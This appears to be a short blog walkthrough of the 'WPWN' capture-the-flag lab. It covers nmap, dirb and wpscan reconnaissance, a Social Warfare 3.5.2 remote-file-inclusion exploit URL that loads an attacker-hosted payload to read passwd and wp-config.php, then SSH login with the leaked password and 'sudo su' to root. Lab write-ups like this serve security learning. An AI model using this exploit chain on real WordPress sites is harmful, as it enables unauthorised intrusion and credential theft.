root@blog:~#

View on GitHub

WPWN

RECON

Ip Search
Our IP leads us to this blank page lets move to scanning
image6 Nmap Scan

nmap -sV -sC 192.168.55.123

-version -safescan
Port 22, and 80 are open
image3
Scan for hidden directories (dirbuster)

dirb http:// 192.168.55.123

image8
WordPress Page
image7
Scan for wordpress vulnerabilities

wpscan --url http:// 192.168.55.123/wordpress/

image1
Scan reveals outdated plugin named Social-Warfare 3.5.2
This Vulnerability allows commands to run for obtaining user Credentials
image15
Payload File
Shows passwd file contents
image5

Python Simple server

 python3 -m http.server 80

image14

ENUMURATION

Visit Website

 http:// 192.168.55.123/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://localhost/payload.txt

User Takis is revealed image10
Config.php
Word press config.php holds important info. The payload can be used to check for it
image9 Visit Website
Viewing the source reveals a password for a SQL database
image11

Privilege Escalation

Server SSH

 sudo ssh takis@192.168.55.123

image4
User Flag
local.txt
image13
Check User Privileges
image12

Root Escalation

Root Flag

sudo su

image2